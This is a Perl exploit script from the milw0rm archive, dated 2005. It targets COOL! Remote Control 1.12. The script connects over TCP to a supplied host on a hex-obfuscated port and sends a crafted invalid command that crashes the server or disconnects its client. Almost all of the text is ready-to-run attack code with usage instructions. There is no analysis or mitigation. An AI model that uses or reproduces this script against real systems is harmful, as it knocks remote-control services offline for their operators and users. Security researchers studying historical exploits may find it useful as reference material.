1 #!usr/bin/perl
2 #
3 # COOL! Command Execution DOS Exploit
4 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5 # Infam0us Gr0up − Securiti Research
6 #
7 # Info: infamous.2hell.com
8 # Vendor URL: www.yaosoft.com
9 #
10 # * If Remote Control(Client application) is running then already connected to server,
11 # this command exploit will made Remote Control as Client disconnected from server machine.
12 # But if the Remote Control is not currently connected to Remote Server,then
13 # by send specified command to Remote Server its allow the server crashed/closed
14 #
15
16
17 $ARGC=@ARGV;
18 if ($ARGC !=1) {
19 print "Usage: $0 [host]\n";
20 print "Exam: $0 127.0.0.1\n";
21 print "\n";
22 exit;
23 }
24 use Socket;
25
26 my($remote,$port,$iaddr,$paddr,$proto);
27 $remote=$ARGV[0];
28 $popy = "\x31\x31\x39\x38\x30";
29
30 print "\n[+] Connect to host..\n";
31 $iaddr = inet_aton($remote) or die "[−] Error: $!";
32 $paddr = sockaddr_in($popy, $iaddr) or die "[−] Error: $!";
33 $proto = getprotobyname(’tcp’) or die "[−] Error: $!";
34
35 socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[−] Error: $!";
36 connect(SOCK, $paddr) or die "[−] Error: $!";
37
38 print "[+] Connected\n";
39 print "[+] Send invalid command..\n";
40
41 $empty =
42 "\x49\x4e\x46\x41\x4d\x4f\x55\x531".
43 "\x47\x52\x4f\x55\x50";
44
45 send(SOCK, $empty, 0) or die "[−] Cannot send query: $!";
46 sleep(2);
47 print "[+] DONE\n";
48 print "[+] Check if server crash!\n";
49 close(SOCK);
50 exit;
51
52 # milw0rm.com [2005−09−11]
Page 1/1
COOL Remote Control 1.12 Remote Denial of Service Exploit
basher13
09/11/2005